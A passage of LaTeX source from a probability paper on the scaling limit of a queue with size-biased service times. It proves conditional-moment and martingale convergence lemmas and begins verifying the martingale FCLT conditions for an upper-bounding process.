where the error term is uniform in $i= O_{\mathbb P_{\sss S}}(n^{2/3})$.
Moreover, the convergence holds in $L^1$, i.e.
\begin{equation}\label{eq:1+alphaConditionalMoment_L1_convergence}%
\E_{\sss S}\Big[\Big\vert\E_{\sss S}[ S_{c(i)}^{1+\gamma}\mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big] = o_{\mathbb P}(1),
\end{equation}%
uniformly in $i=O_{\PS}(n^{2/3})$.
\end{lemma}%
\begin{proof}
In order to apply Lemma \ref{lem:size_biased_distribution}, we first split
\begin{equation}%
S_{c(i)}^{1+\gamma} = (S_{c(i)}\wedge K)^{1+\gamma} + ((S_{c(i)} - K)^+)^{1+\gamma},
\end{equation}%
where $K>0$ is arbitrary, so that
\begin{equation}%
\E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] = \E_{\sss S}[(S_{c(i)}\wedge K)^{1+\gamma} \mid \mathcal F_{i-1}] + \E_{\sss S}[((S_{c(i)} - K)^+)^{1+\gamma} \mid \mathcal F_{i-1}].
\end{equation}%
The first term is bounded, and therefore converges to $\mathbb E[(S\wedge K)^{1+\gamma}S^{\alpha}]/\mathbb E[S^{\alpha}]$ by Lemma \ref{lem:size_biased_distribution}.
The second term is bounded through Markov's inequality, as
\begin{equation}%
\mathbb P_{\sss S} (\E_{\sss S}[((S_{c(i)} - K)^+)^{1+\gamma} \mid \mathcal F_{i-1}] \geq \varepsilon) \leq \frac{\E_{\sss S}[((S_{c(i)}-K)^+)^{1+\gamma}]}{\varepsilon}.
\end{equation}%
Next we apply Lemma \ref{lem:expectation_service_times_ordering} with $f(x) = f_{\scriptscriptstyle K}(x) =((x-K)^+)^{1+\gamma}$,
\begin{equation}\label{eq:1+alpha_error_term_bound}%
\E_{\sss S}[((S_{c(i)}-K)^+)^{1+\gamma}] \leq C_{f_{\scriptscriptstyle K},\scriptscriptstyle S}.
\end{equation}%
Therefore,
\begin{align}\label{eq:1+alpha_error_term_bound_second}%
\Big\vert \E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert &\leq \Big\vert\E_{\sss S}[(S_{c(i)}\wedge K)^{1+\gamma} \mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert + C_{f_{\scriptscriptstyle K},\scriptscriptstyle S}.
\end{align}%
The proof of Lemma \ref{lem:expectation_service_times_ordering} shows that, for any $\varepsilon>0$, $\lim_{K\rightarrow\infty}C_{f_{\scriptscriptstyle K},\scriptscriptstyle S} \leq \varepsilon$, thus $\lim_{K\rightarrow\infty}C_{f_{\scriptscriptstyle K},\scriptscriptstyle S} = 0$. Therefore, by letting $K\rightarrow\infty$ in \eqref{eq:1+alpha_error_term_bound_second}, \eqref{eq:1+alphaConditionalMoment} follows. Next, we split
\begin{align}%
\E_{\sss S}\Big[\Big\vert \E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big] &\leq \E_{\sss S}\Big[\Big\vert(S_{c(i)}\wedge K)^{1+\gamma} - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big]\notag\\
&\quad+\E_{\sss S}[((S_{c(i)} - K)^+)^{1+\gamma}].
\end{align}%
The second term can be bounded as in \eqref{eq:1+alpha_error_term_bound}. For the first term,
\begin{align}%
\E_{\sss S}&\Big[\Big\vert(S_{c(i)}\wedge K)^{1+\gamma} - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big] \leq \Big\vert\frac{\sum_{j=1}^n(S_{j}\wedge K)^{1+\gamma}S_j^{\alpha}}{\sum_{j=1}^n S_j^{\alpha}} - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert \notag\\
&+\E_{\sss S}\Big[\Big\vert \frac{\sum_{j=1}^n(S_j\wedge K)^{1+\gamma}S_j^{\alpha}\sum_{l\in\served{i-1}}S_l^{\alpha} }{(\sum_{j=1}^nS_j^{\alpha})^2}\Big\vert\Big] + \E_{\sss S}\Big[\Big\vert\frac{\sum_{l=1}^n S_l^{\alpha}\sum_{j\in \served{i-1}}(S_j\wedge K)^{1+\gamma}S_j^{\alpha}}{(\sum_{j=1}^nS_j^{\alpha})^2} \Big\vert\Big],
\end{align}%
where we have used that $\vert(a-b)/(c-d) -a/c\vert\leq ad/c^2 + bc/c^2$, for positive $a$, $b$, $c$, $d$. The second and third terms converge uniformly over $i=O_{\mathbb P_{\sss S}}(n^{2/3})$ by Lemma \ref{lem:unif_convergence_random_sums}. Summarizing,
\begin{align}%
\E_{\sss S}\Big[\Big\vert \E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big] &\leq \Big\vert\frac{\sum_{j=1}^n(S_{j}\wedge K)^{1+\gamma}S_j^{\alpha}}{\sum_{j=1}^n S_j^{\alpha}} - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert \notag\\
&\quad+ \frac{\sum_{l=1}^n((S_l-K)^+)^{1+\gamma}}{\sum_{j=1}^n S_j^{\alpha}} + o_{\mathbb P}(1).
\end{align}%
Letting first $n\rightarrow\infty$ and then $K\rightarrow\infty$, \eqref{eq:1+alphaConditionalMoment_L1_convergence} follows.
\end{proof}
We will make use of Lemma \ref{lem:1+alphaConditionalMoment} several times throughout the proof, with the specific choices $\gamma \in \{0,\alpha,1\}$. The following lemma is of central importance in the proof of the uniform convergence of the quadratic part of the drift:
\begin{lemma}\label{lem:size_biased_service_times_unif_convergence}%
As $n\rightarrow\infty$,
\begin{equation}\label{eq:size_biased_service_times_unif_convergence}%
n^{-2/3}\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha} - \frac{\mathbb E[S^{1+2\alpha}]}{\mathbb E[S]}\Big)\Big\vert \stackrel{\mathbb P}{\rightarrow} 0.
\end{equation}%
\end{lemma}%
\begin{proof}
By Lemma \ref{lem:1+alphaConditionalMoment}, \eqref{eq:size_biased_service_times_unif_convergence} is equivalent to
\begin{equation}%
n^{-2/3}\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}- \mathbb E[S_{c(i)}^{1+\alpha}\mid \mathcal F_{i-1}]\Big)\Big\vert \stackrel{\mathbb P}{\rightarrow} 0.
\end{equation}%
We split the event space and separately bound
\begin{equation}\label{eq:size_biased_service_times_unif_convergence_smaller_Kn}%
n^{-2/3}\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} - \mathbb E[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} \mid \mathcal F_{i-1}]\Big)\Big\vert
\end{equation}%
and
\begin{equation}\label{eq:size_biased_service_times_unif_convergence_greater_Kn}%
n^{-2/3}\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} - \mathbb E[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} \mid \mathcal F_{i-1}]\Big)\Big\vert,
\end{equation}%
for a sequence $(K_n)_{n\geq1}$ that we choose later on and is such that $K_n\rightarrow\infty$. We start with \eqref{eq:size_biased_service_times_unif_convergence_smaller_Kn}. Since the sum inside the absolute value is a martingale as a function of $j$, \eqref{eq:size_biased_service_times_unif_convergence_smaller_Kn} can be bounded through Doob's $L^p$ inequality \cite[Theorem 11.2]{klenke2008probability} with $p=2$ as
\begin{align}%
\mathbb P_{\sss S}\Big(\sup_{j\leq tn^{2/3}}&\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} - \E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} \mid \mathcal F_{i-1}]\Big)\Big\vert \geq\varepsilon n^{2/3}\Big) \notag\\
&\leq \frac{1}{\varepsilon n^{4/3}}\E_{\sss S}\Big[\sum_{i=1}^{tn^{2/3}}(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} -\E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} \mid \mathcal F_{i-1}])^2\Big]\notag\\
&\leq \frac{2}{\varepsilon n^{4/3}}\sum_{i=1}^{tn^{2/3}}\E_{\sss S}[S_{c(i)}^{2+2\alpha} \mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}}] \leq \frac{2}{\varepsilon n^{4/3}}\sum_{i=1}^{tn^{2/3}}K_n^{2\alpha}\E_{\sss S}[S_{c(i)}^{2}] .
\end{align}%
Lemma \ref{lem:1+alphaConditionalMoment} allows us to approximate $\E_{\sss S}[S_{c(i)}^{2}]$ uniformly by $\frac{\mathbb E[S^{2+\alpha}]}{\mathbb E[S^{\alpha}]}$. Thus, we get
\begin{align}%
\frac{2}{\varepsilon n^{4/3}}\sum_{i=1}^{tn^{2/3}}\Big(K_n^{2\alpha}\frac{\mathbb E[S^{2+\alpha}]}{\mathbb E[ S^{\alpha}]} +o_{\mathbb P}(1)\Big) &= \frac{t K_n^{2\alpha}}{\varepsilon n^{2/3}} O_{\mathbb P}(1),
\end{align}%
which converges to zero as $n\rightarrow\infty$ if and only if $K_n^{\alpha}/n^{1/3}$ does.
We now turn to \eqref{eq:size_biased_service_times_unif_convergence_greater_Kn} and apply Doob's $L^1$ martingale inequality \cite[Theorem 11.2]{klenke2008probability} to obtain
\begin{align}\label{eq:size_biased_service_times_unif_convergence_greater_Kn_second}%
&\mathbb P_{\sss S}\Big(\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} - \E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} \mid \mathcal F_{i-1}]\Big)\Big\vert\geq\varepsilon n^{2/3}\Big) \notag\\
&\leq \frac{1}{\varepsilon n^{2/3}}\E_{\sss S}\Big[\Big\vert\sum_{i=1}^{tn^{2/3}}(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} -\E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} \mid \mathcal F_{i-1}])\Big\vert\Big]\notag\\
&\leq \frac{2}{\varepsilon n^{2/3}}\sum_{i=1}^{tn^{2/3}}\E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} ] \leq \frac{2}{\varepsilon n^{2/3}}\sum_{i=1}^{tn^{2/3}}\E_{\sss S}[S_{c(1)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(1)}> K_n\}} ](1+O_{\PS}(1))\notag\\
& = \frac{2t}{\varepsilon}\E_{\sss S}[S_{c(1)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(1)}> K_n\}}](1+O_{\PS}(1))=o_{\mathbb P}(1).
\end{align}%
We have used Lemma \ref{lem:1+alphaConditionalMoment} in the second inequality, and Lemma \ref{lem:expectation_service_times_ordering} with $f(x) = x^{1+\alpha}\mathds 1_{\{x^{1+\alpha} > K_n\}}$ in the third. The right-most term in \eqref{eq:size_biased_service_times_unif_convergence_greater_Kn_second} is $o_{\mathbb P}(1)$ as $n\rightarrow\infty$ by the strong Law of Large Numbers. Note that this side of the bound does not impose additional conditions on $K_n$, so that, if we take $K_n= n^{c}$, it is sufficient that $c<\frac{1}{3\alpha}$, with the convention that $\frac{1}{0}=\infty$.
\end{proof}
We conclude this section with a technical lemma concerning error terms in the computations of quadratic variations. Denote the density (resp.~distribution function) of a rate $\lambda$ exponential random variable by $f_{\scriptscriptstyle E}(\cdot)$ (resp.~$F_{\scriptscriptstyle E}(\cdot)$):
\begin{lemma}\label{lem:n_squared_err_term}%
We have
\begin{equation}\label{eq:n_squared_err_term_statement}%
\E_{\sss S}\Big[\sum_{h,q\in[n]}\Big\vertF_{\scriptscriptstyle E} \Big(\frac{S_{c(i)}S_h^{\alpha}}{n}\Big) - \frac{\lambda S_{c(i)}S_h^{\alpha}}{n}\Big\vert \Big\vert F_{\scriptscriptstyle E} \Big( \frac{S_{c(i)}S_q^{\alpha}}{n}\Big) - \frac{\lambda S_{c(i)}S_q^{\alpha}}{n}\Big\vert \mid \mathcal F_{i-1}\Big] = o_{\mathbb P}(1)
\end{equation}%
uniformly in $i=O(n^{2/3})$.
\end{lemma}%
\begin{proof}%
Since $\vertF_{\scriptscriptstyle E} (x) - x\vert = O(x^2)$, the bound $\vert\lambda S_{c(i)}S_h^{\alpha}/n-F_{\scriptscriptstyle E}(S_{c(i)}S_h^{\alpha}/n)\vert \leq C(S_{c(i)}S_h^{\alpha}/n)^{1+\varepsilon}$ holds almost surely for $0<\varepsilon<1$ and $C>0$, which gives
\begin{align}%
\lambda^2\sum_{h,q\in[n]}\E_{\sss S}\Big[\Big( \frac{S_{c(i)}S_h^{\alpha}}{n}\Big)^{1+\varepsilon} \Big( \frac{S_q^{\alpha}S_{c(i)}}{n}\Big)^{1+\varepsilon} \mid \mathcal F_{i-1}\Big]= \frac{\lambda^2}{n^{2+2\varepsilon}}\sum_{h,q\in[n]} \E_{\sss S}[ S_{c(i)}^{2+2\varepsilon} \mid \mathcal F_{i-1}] S_h^{\alpha(1+\varepsilon)} S_q^{\alpha(1+\varepsilon)}
\end{align}%
Therefore,
\begin{align}\label{eq:n_squared_err_term_final}%
\lambda^2&\sum_{h,q\in[n]}\E_{\sss S}\Big[\Big( \frac{S_{c(i)}S_h^{\alpha}}{n}\Big)^{1+\varepsilon} \Big( \frac{S_q^{\alpha}S_{c(i)}}{n}\Big)^{1+\varepsilon}\mid \mathcal F_{i-1}\Big] \notag\\
&\leq \frac{\lambda^2}{n^{2+2\varepsilon}}\max_{j\in[n]}S_j^{2\varepsilon}\E_{\sss S}[ S_{c(i)}^{2} \mid \mathcal F_{i-1}]\sum_{h,q\in[n]} S_h^{\alpha(1+\varepsilon)} S_q^{\alpha(1+\varepsilon)} \notag\\
&\leq \frac{\lambda^2\mathbb E[S^{2+\alpha}]}{\mathbb E[S^{\alpha}]}\frac{\max_{j\in[n]}S_j^{2\varepsilon}}{n^{2\varepsilon}}\frac{1}{n^2}\sum_{h,q\in[n]} S_h^{\alpha(1+\varepsilon)} S_q^{\alpha(1+\varepsilon)} +o_{\mathbb P}(1),
\end{align}%
where in the last step we used Lemma \ref{lem:1+alphaConditionalMoment}. Note that, since $\mathbb E[S^{2+\alpha}]<\infty$, by Lemma \ref{lem:max_iid_random_variables} $\max_{j\in[n]}S_j^{2\varepsilon} = o_{\mathbb P}(n^{2\varepsilon/(2+\alpha)})$.
The right-most term in \eqref{eq:n_squared_err_term_final} then tends to zero as $n$ tends to infinity as long as $0<\varepsilon<\min\{1,2/\alpha\}$.
\end{proof}%
\section{Proving the scaling limit}\label{sec:proof_main_result}
We first establish some preliminary estimates on $N_n(\cdot)$ that will \bl{be} crucial for the proof of convergence. We will upper bound the process $N_n(\cdot)$ by a simpler process $N_n^{\scriptscriptstyle U}(\cdot)$ in such a way that the increments of $N_n^{\scriptscriptstyle U}(\cdot)$ almost surely dominate the increments of $N_n(\cdot)$. We also show that, after rescaling, $N_n^{\scriptscriptstyle U}(\cdot)$ converges in distribution to $W(\cdot)$. The process $N_n^{\scriptscriptstyle U}(\cdot)$ is defined as $N_n^{\scriptscriptstyle U}(0) = N_n(0)$, and
\begin{equation}\label{eq:pre_reflection_queue_length_process_upper_bound}%
N_n^{\scriptscriptstyle U}(k) = N_n^{\scriptscriptstyle U}(k-1) + A^{\scriptscriptstyle U}_n(k) -1,
\end{equation}%
where
\begin{equation}\label{eq:arrivals_upper_bound}%
A^{\scriptscriptstyle U}_n(k) = \sum_{i\notin\served{k}} \mathds 1 _{\{T_i \leq c_{n,\beta}S_{c(k)}/n\}},
\end{equation}%
with
\begin{equation}
c_{n,\beta}=1+\beta n^{-1/3},
\end{equation}%
and
\begin{equation}%
T_{i} \stackrel{\mathrm d}{=} \textrm{exp}_i(\lambda S_i^{\alpha}).
\end{equation}%
An interpretation of the process $N_n^{\scriptscriptstyle U}(\cdot)$ is that customers are not removed from the pool of potential customers until they have been served. Therefore, a customer could potentially join the queue more than once. We couple the processes $N_n(\cdot)$ and $N_n^{\scriptscriptstyle U}(\cdot)$ as follows. Consider a sequence of arrival times $(T_i)_{i=1}^{\infty}$ and of service times $(S_i)_{i=1}^{\infty}$, then define $A_n(\cdot)$ as \eqref{eq:number_arrivals_during_one_service} and $A_n^{\scriptscriptstyle U}(\cdot)$ as \eqref{eq:arrivals_upper_bound}. With this coupling we have that, almost surely,
\begin{equation}%
A_n(k) \leq A_n^{\scriptscriptstyle U}(k) \qquad \forall~k \geq 1.
\end{equation}%
Consequently,
\begin{equation}\label{eq:pre_reflection_process_domination}%
N_n (k) \leq N_n^{\scriptscriptstyle U}(k)\qquad\forall k\geq 0,
\end{equation}%
and
\begin{equation}\label{eq:reflected_process_domination}%
Q_n(k) = \phi(N_n) (k) \leq\phi(N_n^{\scriptscriptstyle U})(k) =: Q_n^{\scriptscriptstyle U}(k) \qquad\forall k\geq 0,
\end{equation}%
almost surely.
While in general only the upper bounds \eqref{eq:pre_reflection_process_domination} and \eqref{eq:reflected_process_domination} hold, the processes $N_n(\cdot)$ and $N_n^{\scriptscriptstyle U}(\cdot)$ (resp.~$Q_n(\cdot)$ and $Q_n^{\scriptscriptstyle U}(\cdot)$) turn out to be, very close to each other. We start by proving results for $N_n^{\scriptscriptstyle U}(\cdot)$ and $Q_n^{\scriptscriptstyle U}(\cdot)$ because they are easier to treat, and only then we are able to prove that identical results hold for $N_n(\cdot)$ and $Q_n(\cdot)$.
In fact, we introduce the upper bound $N_n^{U}(\cdot)$ to deal with the complicated index set for the summation in \eqref{eq:number_arrivals_during_one_service}. The difficulty arises as follows: in order to estimate $N_n(\cdot)$ one has to estimate $A_n(\cdot)$. To do this, one has to separately (uniformly) bound each element in the sum, and also estimate the number of elements in the sum. The first goal is accomplished, for example, through Lemma \ref{lem:1+alphaConditionalMoment}, while for the second the crude upper bound $n$ is not strict enough. However, estimating $\vert \nu_k\vert$ requires an estimate on $N_n(\cdot)$ itself, as \eqref{eq:cardinality_nu} shows. To solve this circularity, we introduce a bootstrap argument: first, we upper bound $N_n(\cdot)$ and we obtain estimates on the upper bound, from this follows an estimate on $\vert \nu_k\vert$, and this in turn allows us to estimate $N_n(\cdot)$.
This technique can be applied to solve a recently found technical issue in the proof of the main result of \cite{bhamidi2010scaling}. The authors in \cite{bhamidi2010scaling} prove convergence of a process which upper bounds the exploration process of the graph. Therefore, their main result is analogous to Theorem \ref{MainTheorem_U}. However, a further step is required to complete the proof of convergence of the exploration process, and this is provided by our approach.
\begin{theorem}[Convergence of the upper bound]\label{MainTheorem_U}
\begin{equation}
n^{-1/3}N_n^{\scriptscriptstyle U}( t n^{2/3})\stackrel{\mathrm{d}}{\rightarrow} W(t)\qquad\mathrm{in}~(\mathcal D, J_1)~\mathrm{as}~n\rightarrow\infty,
\end{equation}
where $W(\cdot)$ is the diffusion process in \eqref{eq:main_theorem_delta_G_1_diffusion_definition}.
In particular,
\begin{equation}%
n^{-1/3}\phi(N_n^{\scriptscriptstyle U})( t n^{2/3})\stackrel{\mathrm{d}}{\rightarrow} \phi(W)(t)\qquad\mathrm{in}~(\mathcal D, J_1)~\mathrm{as}~n\rightarrow\infty.
\end{equation}%
\end{theorem}
The next section is dedicated to the proof of Theorem \ref{MainTheorem_U}.
}
\subsection{Convergence of the upper bound}\label{sec:proof_thm_U}
We use a classical martingale decomposition followed by a martingale FCLT.
The process $N_n^{\scriptscriptstyle U}(\cdot)$ in \eqref{eq:pre_reflection_queue_length_process_upper_bound} can be decomposed as $N_n^{\scriptscriptstyle U}(k) = M_n^{\scriptscriptstyle U}(k) + C_n^{\scriptscriptstyle U}(k)$, where $M_n^{\scriptscriptstyle U}(\cdot)$ is a martingale and $C_n^{\scriptscriptstyle U}(\cdot)$ is a drift term, as follows:
\begin{align}%
M^{\scriptscriptstyle U}_n(k) &= \sum_{i=1}^k(A^{\scriptscriptstyle U}_n(i) - \E_{\sss S}[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}]), \notag\\
C^{\scriptscriptstyle U}_n(k) &= \sum_{i=1}^k (\E_{\sss S}[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}]-1).
\end{align}%
Moreover, $(M^{\scriptscriptstyle U}_n(k))^2$ can be written as $(M^{\scriptscriptstyle U}_n(k))^2 = Z^{\scriptscriptstyle U}_n(k) + B^{\scriptscriptstyle U}_n(k)$ with $Z^{\scriptscriptstyle U}_n(k)$ a martingale and $B^{\scriptscriptstyle U}_n(k)$ the compensator, or quadratic variation, of $M^{\scriptscriptstyle U}_n(k)$ given by
\begin{equation}
B^{\scriptscriptstyle U}_n(k) = \sum_{i=1}^k(\E_{\sss S}[(A^{\scriptscriptstyle U}_n(i))^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}]^2).
\end{equation}%
In order to prove convergence of $N^{\scriptscriptstyle U}_n(\cdot)$ we separately prove convergence of $C^{\scriptscriptstyle U}_n(\cdot)$ and of $M^{\scriptscriptstyle U}_n(\cdot)$. We prove the former directly, and the latter by applying the martingale FCLT \cite[Theorem~7.1.4]{MarkovProcesses}. For this, we need to verify the following conditions:
\begin{enumerate}[label=(\roman*)]
\item \label{size_biased:eq:first_condition_martingale_FCLT} $\sup_{t\leq \bar t} \vert n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3})- \beta t + \lambda\frac{\mathbb E[S^{1+2\alpha}]}{2\mathbb E[S^{\alpha}]} t^2\vert\stackrel{\mathbb P}{\longrightarrow}0,\qquad \forall \bar t\in \mathbb R^+$;
\item \label{size_biased:eq:second_condition_martingale_FCLT}$ n^{-2/3}B_n^{\scriptscriptstyle U}(tn^{2/3})\stackrel{\mathbb P}{\longrightarrow} \sigma^2 t,\qquad \forall t\in \mathbb R^+$;
\item \label{size_biased:eq:third_condition_martingale_FCLT}$\lim_{n\rightarrow\infty}n^{-2/3} \E_{\sss S}[\sup_{t\leq\bar t} \vert B_n^{\scriptscriptstyle U}(tn^{2/3})-B_n^{\scriptscriptstyle U}(tn^{2/3}-)\vert]=0,\qquad \forall \bar t\in \mathbb R^+$;
\item \label{size_biased:eq:fourth_condition_martingale_FCLT}$\lim_{n\rightarrow\infty} n^{-2/3} \E_{\sss S}[\sup_{t\leq\bar t} \vert M_n^{\scriptscriptstyle U}(tn^{2/3})-M_n^{\scriptscriptstyle U}(tn^{2/3}-)\vert^2]=0,\qquad \forall \bar t\in \mathbb R^+$.
\end{enumerate}
\subsubsection{Proof of \ref{size_biased:eq:first_condition_martingale_FCLT} for the upper bound} \label{sec:drift_of_upper_bounding_process_converges_to_zero}
First we obtain an explicit expression for $\mathbb E[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}]$, as
\begin{align}\label{eq:conditioned_arrivals_first_eq}%
\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}] &= \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i)= j\mid\mathcal F_{i-1})\sum_{l\notin\served{i-1}\cup \{j\}}F_{\scriptscriptstyle E}\Big(\frac{c_{n,\beta}S_jS_l^{\alpha}}{n}\Big)\\
&= \sum_{j\notin\served{i-1}}\mathbb P_{\sss S} (c(i) = j \mid \mathcal F_{i-1})\sum_{l=1}^n \frac{c_{n,\beta}\lambda S_jS_l^{\alpha}}{n} \notag\\
&\quad - \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i) = j \mid \mathcal F_{i-1})\sum_{l\in\served{i-1}\cup \{j\}} \frac{c_{n,\beta}\lambda S_jS_l^{\alpha}}{n}\notag\\
&\quad + \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i)= j \mid \mathcal F_{i-1})\sum_{l\notin\served{i-1}\cup \{j\}} \Big( F_{\scriptscriptstyle E}\Big(\frac{c_{n,\beta}S_jS_l^{\alpha}}{n}\Big) - \frac{c_{n,\beta}\lambda S_jS_l^{\alpha}}{n}\Big)\notag
\end{align}%
The third term is an error term. Indeed, for some $\zeta_n \in [0,S_{c(i)}S_l/n]$,
\begin{align}\label{eq:taylor_error_expanding_FT}%
\E_{\sss S}&\Big[\Big\vert\sum_{l\notin\served{i-1}\cup{\{j\}}}\! F_{\scriptscriptstyle E} \Big(\frac{S_{c(i)}S_l^{\alpha}}{n}\Big) - \frac{\lambda S_{c(i)}S_l^{\alpha}}{n}\Big\vert \mid \mathcal F_{i-1}\Big] \notag\\
&\leq \sum_{l\in[n]}\E_{\sss S}\Big[\Big\vert F_{\scriptscriptstyle E} \Big(\frac{S_{c(i)}S_l^{\alpha}}{n}\Big)- \frac{\lambda S_{c(i)}S_l^{\alpha}}{n}\Big\vert \mid \mathcal F_{i-1}\Big]\notag\\
&= \frac{1}{2n^2} \E_{\sss S}[\vertF_{\scriptscriptstyle E}''(\zeta_n)S_{c(i)}^2\vert \mid \mathcal F_{i-1}]\sum_{l\in[n]}S_l^{2\alpha}\leq \frac{\lambda^2}{2n^2}\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\sum_{l\in[n]}S_l^{2\alpha},
\end{align}%
since $\vert F_{\scriptscriptstyle E}''(x)\vert \leq \lambda ^2$ for all $x\geq 0$. By Lemma \ref{lem:1+alphaConditionalMoment} this can be bounded by
\begin{align}\label{eq:F_taylor_expansion_error}%
\frac{\lambda^2}{2n^2}(C_n+ o_{\mathbb P}(1))\sum_{l\in[n]}S_l^{2\alpha},
\end{align}%
where $C_n$ is bounded w.h.p.~and the $o_{\mathbb P}(1)$ term is uniform in $i=O(n^{2/3})$. Therefore, the third term in \eqref{eq:conditioned_arrivals_first_eq} is $o_{\mathbb P}(n^{-1/3})$.
The remaining terms in \eqref{eq:conditioned_arrivals_first_eq} can be simplified as
\begin{align}\label{eq:ConditionedArrivalsFirst_U}%
\E_{\sss S}&[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}] -1= \sum_{j\notin\served{i-1}}\mathbb P_{\sss S} (c(i) = j \mid \mathcal F_{i-1})c_{n,\beta}\lambda S_j\frac{\sum_{l\in[n]} S_l^{\alpha}}{n}\notag\\
&\quad - \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i) = j \mid \mathcal F_{i-1})\sum_{l\in\served{i-1}} \frac{c_{n,\beta}\lambda S_jS_l^{\alpha}}{n} \notag\\
&\quad- c_{n,\beta}\lambda\sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i) = j\mid \mathcal F_{i-1})\frac{S_j^{1+\alpha}}{n} - 1 + o_{\mathbb P}(n^{-1/3})\notag\\
&=\Big(c_{n,\beta}\lambda\frac{\sum_{l\in[n]} S_l^{\alpha}}{n}\mathbb E[S_{c(i)}\mid\mathcal F_{i-1}]-1\Big) - c_{n,\beta}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]\sum_{l\in\served{i-1}}\lambda\frac{S_l^{\alpha}}{n} \notag\\
&\quad- c_{n,\beta}\frac{\lambda}{n}\E_{\sss S}[S_{c(i)}^{1+\alpha}\mid\mathcal F_{i-1}]+ o_{\mathbb P}(n^{-1/3}).
\end{align}%
For the first term of \eqref{eq:ConditionedArrivalsFirst_U}, using $\frac{c}{a-b}= \frac{c}{a}+ \frac{c}{a-b}\frac{b}{a}$, with $a = \sum_{l\in[n]}S_l^{\alpha}$ and $b = \sum_{l \in \served{i-1}}S_l^{\alpha}$,
\begin{align}\label{eq:ConditionedArrivalsFirstTerm}%
c_{n,\beta}\lambda&\frac{\sum_{l=1}^n S_l^{\alpha}}{n}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]-1 \notag\\
&=c_{n,\beta}\lambda\frac{\sum_{l\in[n]} S_l^{\alpha}}{n} \sum_{j\notin \served{i-1}} \frac{S_j^{1+\alpha}}{\sum_{l\in [n]}S_l^{\alpha}}-1 + c_{n,\beta}\lambda\frac{\sum_{l\in[n]} S_l^{\alpha}}{n}\sum_{j\notin\served{i-1}}\frac{S_j^{1+\alpha}}{\sum_{l\notin\served{i-1}}S_l^{\alpha}}\frac{\sum_{s\in\served{i-1}}S_s^{\alpha}}{\sum_{l\in[n]}S_l^{\alpha}}\notag\\
